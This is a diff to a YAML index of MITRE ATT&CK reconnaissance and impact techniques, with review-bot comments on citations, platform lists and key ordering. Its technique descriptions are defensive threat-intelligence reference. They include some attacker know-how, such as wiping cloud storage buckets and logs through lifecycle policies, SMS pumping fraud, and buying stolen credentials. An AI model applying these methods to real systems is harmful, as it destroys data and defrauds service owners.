+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
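Review bot: the reshuffled description detaches seven citations from the claim they support. In the removed text, `(Citation: Register Deloitte)` through `(Citation: CNET Leaks)` followed the sentence about credential leaks to search engines, breach dumps and code repositories; in the added text they sit directly after `(Citation: ATT ScanBox)` on the sentence about compromised sites collecting cookies, while the leak sentence, moved into the next paragraph, now carries no citations at all. If the text is taken verbatim from the upstream bundle this is an upstream quirk rather than this PR's, but it is worth reporting, since Gitrob, truffleHog and the GitHub/Uber/Deloitte stories concern repository leaks, not watering holes. The three new citations (Bleeping Computer 2easy 2021, SecureWorks Infostealers 2023, Bleeping Computer Stealer Logs 2023) are added to external_references in later hunks for this object, so those resolve.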
@@ -62580,6 +63255,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -62590,7 +63266,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -62600,6 +63276,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -62612,6 +63292,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -62634,6 +63318,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -62641,9 +63329,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -62702,7 +63389,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -62722,7 +63409,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
@@ -62744,7 +63430,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -62760,12 +63446,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -62834,7 +63518,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -62882,31 +63566,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -62915,19 +63580,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
@@ -62985,7 +63672,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -63006,7 +63692,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -63022,8 +63708,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -63049,7 +63733,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -63065,8 +63749,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -63090,7 +63772,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -63112,13 +63794,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -63210,13 +63890,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -63225,7 +63904,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -63242,17 +63920,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
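Review bot: this hunk removes Azure AD, Office 365, SaaS and Google Workspace from `x_mitre_platforms` for T1498.001 and bumps `x_mitre_version` from 1.3 to 1.4, and the same four platforms disappear from T1499.003 (hunks at -63419 and -63465), T1499.004 (-63670 and -63720) and T1498.002 (-63819). Any per-platform index derived from `x_mitre_platforms` has to be regenerated in the same change, or it will keep listing these techniques under platforms the technique entries no longer claim. The `x_mitre_modified_by_ref` removal here is only a move (it is re-added in the next hunk), so the platform list and the version bump are the actual content changes to review.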
@@ -63277,7 +63950,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
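Review bot: the two additions here, `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref`, restore keys that the preceding two hunks removed from the same T1498.001 entry (the 2.1.0 value at -63225, the modified_by_ref at -63242), so the net effect is a spec version bump plus a key reorder. The same move-to-end pattern repeats for `type`, `id`, `created`, `created_by_ref` and `external_references` across T1499.003, T1565.001, T1489, T1499.004 and T1565.003 below and makes those entries read as deleted and recreated. If the generator can emit keys in a fixed order (or sort them), future ATT&CK refreshes will diff down to the content that actually changed.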
@@ -63315,7 +63989,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -63349,12 +64023,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -63419,42 +64091,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
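Review bot: both new sub-techniques added here, T1485.001 (Lifecycle-Triggered Deletion) and T1496.003 (SMS Pumping), carry `x_mitre_detection: ''` even though each lists a data source (`Cloud Storage: Cloud Storage Modification`, `Application Log: Application Log Content`); if that is what upstream ships it is fine to mirror, but anything that renders the detection text should tolerate the empty string rather than treating it as a missing key. Two smaller points in the T1485.001 description: the permission is named `PutLifecycleConfiguration` while the API call is named `PutBucketLifecycle`, so the two identifiers do not match and are worth checking against the cited AWS lifecycle documentation, and the `\n\n` escapes in the double-quoted scalar are valid YAML but differ from the `|-` block style used for the neighbouring T1496.003 description. Finally, the hunk shows T1499.003 deleted at its old position and re-created after T1496.003, which is a reorder rather than a change to that technique; the real changes to T1499.003 are in the two hunks that follow.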
@@ -63465,13 +64222,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -63479,12 +64243,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -63545,109 +64330,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
